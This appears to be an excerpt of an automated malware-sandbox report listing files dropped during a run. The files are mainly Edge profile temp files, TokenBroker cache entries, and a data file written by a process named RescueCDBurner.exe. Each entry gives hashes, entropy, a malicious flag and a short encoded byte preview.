                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):44707
                                                                                                                                                                                                                                                                          Entropy (8bit):6.095908255950481
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xjbLmZlGjrgb5UflzKqSGPEXKwWE7RTupzKscDX//N+:z/Ps+wsI7yOcGe5bKoRTuiVIos
                                                                                                                                                                                                                                                                          MD5:0E272CC3057753461BEFB9979BEFC8C8
                                                                                                                                                                                                                                                                          SHA1:320104228022EA2A61A2AE755FC4860E4D0E0CE5
                                                                                                                                                                                                                                                                          SHA-256:AC11E852CFE72F3A78A8CABDFEF6814407E8D03AA793D5C78FFD0D86D2963833
                                                                                                                                                                                                                                                                          SHA-512:4881D9951373AAB1CA2E85E689A8F4F7973C56024C43215DBC6F88C174A263F55968339EF09ADDAEF9381A98B2803964A986469418F29D468578ED5884A9A39A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\db2d65e6-a2c4-46bd-93cb-ab44f2630dcb.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):45979
                                                                                                                                                                                                                                                                          Entropy (8bit):6.087984989217149
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5oXAYLmZlGjrgb5UvlzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8HQXiGe5H98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:9827CA834F91F5085FD6405E4631887C
                                                                                                                                                                                                                                                                          SHA1:B1CD220D7FA29A0FD478A4CA66C233456293505A
                                                                                                                                                                                                                                                                          SHA-256:D1ACDFC631299869B75A4B3A0650EEE5548F4BE5038E29E13578EFB930281BAD
                                                                                                                                                                                                                                                                          SHA-512:E94A9181DE75E5B87034A7A487570F4631970FEEDED954437EE2F73A79AAA11FBCDE5E708957A7E960748C568BA168730F11CEEB0DEA3316FD1EE86C3F713279
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\decb02f5-f56f-40f3-8a2f-8f4b8cad44d1.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):45902
                                                                                                                                                                                                                                                                          Entropy (8bit):6.088040418810304
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5dXAYLmZlGjrgb5UflzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8H1XiGe5b98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:6D74D5E34D98241AF6DD8BC6A1FD6700
                                                                                                                                                                                                                                                                          SHA1:DEB85B3C666A11CA9C00DC8AA79C6E6BB3B25880
                                                                                                                                                                                                                                                                          SHA-256:AEC40D0289ED666D5C3FEC3476355DDA1A466330860EFFE296BC53EB3A8F72F5
                                                                                                                                                                                                                                                                          SHA-512:E1CEAB5E8E1AC15EDAC6B50039112E4539FF69B69E2FF5859D2E7D6A6427581A7EA97042B64115FEF961FCD9068A9DEC665C0F62160820A4D995E589DDD0AFBB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ee116c84-f813-4f56-b937-0b1273875129.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):45979
                                                                                                                                                                                                                                                                          Entropy (8bit):6.087983206951434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:768:dMkbJrT8IeQc5oKAYLmZlGjrgb5UvlzKqSGPEX9N2aPEC1oCwWE7RTupzKscDX/c:dMk1rT8HQKiGe5H98aPEIoCoRTuik
                                                                                                                                                                                                                                                                          MD5:BCAC89C9737A2AF1FD5B2B8B31626CED
                                                                                                                                                                                                                                                                          SHA1:FD42AE2C0561B0484A95D1E47B25AC2CF75C1BD5
                                                                                                                                                                                                                                                                          SHA-256:F7A2CA73F3826E894B57A4AB8EEE6A1F05D610018E6756C61829A749012E483C
                                                                                                                                                                                                                                                                          SHA-512:A391D7C345A20356BB61E39C12D3CB83C84A600B017536EDD65ECB69C1329FA9B7C12BFA1B1A307F34412E29000C42AB5DE00779CBD64E148E0DBAD313234FFF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"1e26a01c-02be-45e7-bc52-31cef67b936b"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                          Entropy (8bit):3.838148767621563
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxzxl9Il8u8/SEK0JohvOUsMqH4uCid1rc:myYmqEaOdM9uCB
                                                                                                                                                                                                                                                                          MD5:D1BCB32CE7433E3258BE41B6DABAE1CD
                                                                                                                                                                                                                                                                          SHA1:689AC0C9AD08C8CE69A45F4E208F6D1D17E2BA81
                                                                                                                                                                                                                                                                          SHA-256:93AA977BA5DF6569B915E1B4E9AD805763F20F7EE9BC776C9AF7C94D1E5D427B
                                                                                                                                                                                                                                                                          SHA-512:C69AB8A5DDD670ABA9F9C48BFB73C9D8E2F0BF6FE53889D22C2369B716D1B465593D59E02396D37062926710B1CAC2F151617611DDE42EAB6A0366E1BA4B9CC9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.H.6.R.j.K.Z.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.w.j.f.J.e.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                          Entropy (8bit):3.9970158227595505
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExixD9Il8unecIzWi5OyPjdOyrVgDlEy0zSLfveDPsRcEX19qD6lHKMao:gYU/Oy7dEDlEhuejzhD6lHKVuqPCSe
                                                                                                                                                                                                                                                                          MD5:AAA2E08950B3090CAF981B430BB0747B
                                                                                                                                                                                                                                                                          SHA1:A0D419E1B99CCBB9BB0ADC0878470D025970B0C3
                                                                                                                                                                                                                                                                          SHA-256:3E95D939B3CD71BA43FFFAA17EAA289E73A0C6181F00E7B447A1AFBCC40F3E11
                                                                                                                                                                                                                                                                          SHA-512:90E219C7055DF0A7060749D5A20668694B06A506DDF97D5AEE85AE2E05F93C948836D012520D3A01168E83EF294B565BD319B82AFFAD6504178733374FB40E1D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".k.N.Y.c.c.p.5.i.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.w.j.f.J.e.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                          Entropy (8bit):3.907703654841137
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xCxl9Il8ujcTMDVK8bmKlCT0TI4OSy7d/vc:aQYlcTMJ/DlCT0c4OBG
                                                                                                                                                                                                                                                                          MD5:B237B0CBF5BB5FB30B4B22EC0157D6B2
                                                                                                                                                                                                                                                                          SHA1:A493BC0207910BDD0CA7A453DCB23EDDF74A6EBD
                                                                                                                                                                                                                                                                          SHA-256:92C1052EAEF6F695C210EC04D29FCE9851997F3A64792509A3F843CD5A298055
                                                                                                                                                                                                                                                                          SHA-512:170475584F292AC581727FB152E217F1EDF30799AAC9EC6844AEBCD9E3FF81E18766651042A5A3087980432EDF7FEFC4B29289E910CFFA8464005DE012C888DE
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".T.M.P.w.o.W.+.B.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.E.w.j.f.J.e.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0b1e21cc-a3f9-4fa4-9cd0-0cc0c9bb01ad.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):76326
                                                                                                                                                                                                                                                                          Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                          MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                          SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                          SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                          SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\147a6b25

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5622661
                                                                                                                                                                                                                                                                          Entropy (8bit):7.7230462594085205
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:Q5PkZigz346apnxZq8IjyVuzP90/zL97/4qvXMOkuoNn/H3jlXRgtQwV:APkZigzipnxZhuzVQ/lfvXMhuot/jNRC
                                                                                                                                                                                                                                                                          MD5:384EA84BA63602643E33778F5DDB7345
                                                                                                                                                                                                                                                                          SHA1:9F802095A0AF1109A39AD88D15A2774DD73A7144
                                                                                                                                                                                                                                                                          SHA-256:C9E723A18D7BC536EC6AB80FBD3634C21DAC6C45F433D377959140DDAC625C8A
                                                                                                                                                                                                                                                                          SHA-512:410BA151DE02ED889E12BC8A31F262C3D58DE6399F26BB412BA3D64892A64603F65C49BC606C8F5909C632331E96266F3B44F6D81F16A1BDE25354FCE2D1E97B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:KW7.IW7.HW7.HW7.IW7.lW7.\W7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW6.m.g...c.m.z.+%X.'1C..>Y.' D..#V.<wz.&"k.:8P.):D..#V.<"G.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7..8~.!#^.$>M../7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7..8t.-6C..9D.)9T.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.m.~...e...^.:8D..#....k.:6Z.?8E.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.>e..fb..z`7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.HW7.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\2a17c464-0d5b-41d5-836e-29503ba2cdb1.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\2bde33d7-5394-4d69-a684-46afd17f2e4d.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1577118
                                                                                                                                                                                                                                                                          Entropy (8bit):7.993216544070068
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:49152:aqnqd2fO3GtAAkC4hIdpzW3CKZlJxOvHAbZ:Hn02f4GCF5IdpzKC4JgvA1
                                                                                                                                                                                                                                                                          MD5:4C2FF49D567789294875DF9B7709AD9C
                                                                                                                                                                                                                                                                          SHA1:941A61C93D24F13E5F31FF86A0B7E8D8FF80EDD8
                                                                                                                                                                                                                                                                          SHA-256:AF6D4132A72C85EDD8201B391F0431483DDBCA9770F8DE7AA1D000459762420A
